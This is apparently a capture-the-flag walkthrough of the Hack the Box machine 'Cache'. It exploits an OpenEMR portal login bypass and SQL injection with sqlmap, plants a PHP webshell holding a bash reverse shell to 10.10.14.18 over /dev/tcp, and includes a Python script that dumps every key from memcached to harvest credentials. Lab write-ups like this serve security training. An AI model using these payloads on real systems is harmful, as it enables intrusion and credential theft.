Hack the Box: Cache

Cache

User

Nmap scan
Main site
login page
Credentials in js file
net.html
OpenEMR login page
OpenEMR version
An unauthenticated user is able to bypass the Patient Portal login by simply navigating to the registration page and modifying the requested URL to access the desired page. The request below, reached through that bypass, is saved to a file and handed to sqlmap, which finds the catid parameter injectable:
# cat request 
GET /portal/find_appt_popup_user.php?catid=1 HTTP/1.1
Host: hms.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: OpenEMR=hr2livsbd5ai8c5cmglpme60fi; PHPSESSID=47et9rbfja72qos57se81ea8ha
Upgrade-Insecure-Requests: 1
# sqlmap -r request --tables -v0
--snip--
| users_facility |
| users_secure |
# sqlmap -r request --dump -T users_secure
Password hash of openemr_admin
Cracking the password hash
Admin interface
Webshell
Listable /sites
echo "<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.18/443 0>&1'\"); ?>" > /var/www/hms.htb/public_html/sites/tellico.php
Reverse shell
User flag

Root

Netstat result
Listing content of memcached
Reading luffy credentials
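Listing the cache contents is done by hand over the memcached text protocol: "stats items" reveals which slab classes hold data, "stats cachedump <slab> <limit>" lists the keys in a slab, and "get" retrieves the values. The following is an added example, not code from the original writeup: a small Python client that walks those three commands and returns every key/value pair, with a fake transport fed by constructed sample responses so the parsers can be exercised offline. The key names, values, hostname and port in it are assumptions (only the luffy username comes from the writeup).

```python
import re
import socket
import sys

# Constructed sample responses modelled on the memcached text protocol.
# Keys and values are made up for this example, not captured from the box.
SAMPLE_STATS_ITEMS = (
    "STAT items:5:number 4\r\n"
    "STAT items:5:age 120\r\n"
    "STAT items:5:evicted 0\r\n"
    "END\r\n"
)
SAMPLE_CACHEDUMP = (
    "ITEM link [22 b; 1598140000 s]\r\n"
    "ITEM user [5 b; 1598140000 s]\r\n"
    "ITEM passwd [16 b; 1598140000 s]\r\n"
    "ITEM file [9 b; 1598140000 s]\r\n"
    "END\r\n"
)
SAMPLE_GET = (
    "VALUE link 0 22\r\nhttp://example.invalid\r\n"
    "VALUE user 0 5\r\nluffy\r\n"
    "VALUE passwd 0 16\r\nexample-password\r\n"
    "VALUE file 0 9\r\nnotes.txt\r\n"
    "END\r\n"
)

SLAB_RE = re.compile(r"^STAT items:(\d+):number (\d+)$")
ITEM_RE = re.compile(r"^ITEM (\S+) \[(\d+) b; (\d+) s\]$")


def parse_slab_ids(stats_items):
    """Slab class ids that currently hold at least one item."""
    slabs = []
    for line in stats_items.split("\r\n"):
        m = SLAB_RE.match(line)
        if m and int(m.group(2)) > 0:
            slabs.append(int(m.group(1)))
    return slabs


def parse_cachedump(dump):
    """Key names listed by 'stats cachedump <slab> <limit>'."""
    return [m.group(1) for line in dump.split("\r\n") if (m := ITEM_RE.match(line))]


def parse_get(response):
    """Parse a multi-key 'get' reply into {key: value_bytes}.

    Values are read by the byte length in the VALUE header, so binary data
    and values that contain CRLF are handled correctly.
    """
    data = response.encode()
    out, pos = {}, 0
    while True:
        eol = data.index(b"\r\n", pos)
        header = data[pos:eol].decode()
        if header == "END":
            return out
        _, key, _flags, length = header.split()[:4]  # 5th field (cas) is optional
        start = eol + 2
        out[key] = data[start:start + int(length)]
        pos = start + int(length) + 2  # skip the value and its trailing CRLF


def dump_memcached(send, limit=100):
    """Walk stats items -> stats cachedump -> get and return every key/value.

    `send(cmd)` is a callable that returns the server's full reply for one command.
    """
    keys = []
    for slab in parse_slab_ids(send("stats items")):
        keys += parse_cachedump(send(f"stats cachedump {slab} {limit}"))
    if not keys:
        return {}
    return parse_get(send("get " + " ".join(keys)))


def socket_transport(host="127.0.0.1", port=11211):
    """Real transport: one command per call over a live TCP socket (assumed host/port)."""
    sock = socket.create_connection((host, port), timeout=5)

    def send(cmd):
        sock.sendall(cmd.encode() + b"\r\n")
        buf = b""
        while not buf.endswith(b"END\r\n"):  # every command used here ends its reply with END
            chunk = sock.recv(4096)
            if not chunk:
                break
            buf += chunk
        return buf.decode(errors="replace")

    return send


def fake_transport(cmd):
    """Offline stand-in that answers with the constructed responses above."""
    if cmd == "stats items":
        return SAMPLE_STATS_ITEMS
    if cmd.startswith("stats cachedump 5 "):
        return SAMPLE_CACHEDUMP
    if cmd.startswith("get "):
        return SAMPLE_GET
    return "END\r\n"


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    for key, value in dump_memcached(socket_transport(target)).items():
        print(f"{key} = {value!r}")
```

Run it on the box as `python3 dump.py 127.0.0.1` once you have a shell, since the netstat step shows memcached bound to localhost only. On memcached releases where `stats cachedump` has been deprecated, `lru_crawler metadump all` lists the keys instead and the `get` step is unchanged. The underlying issue is the same either way: anything an application parks in memcached is readable by every local user, so credentials do not belong there.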
Move to luffy
Listing local docker images
Root flag
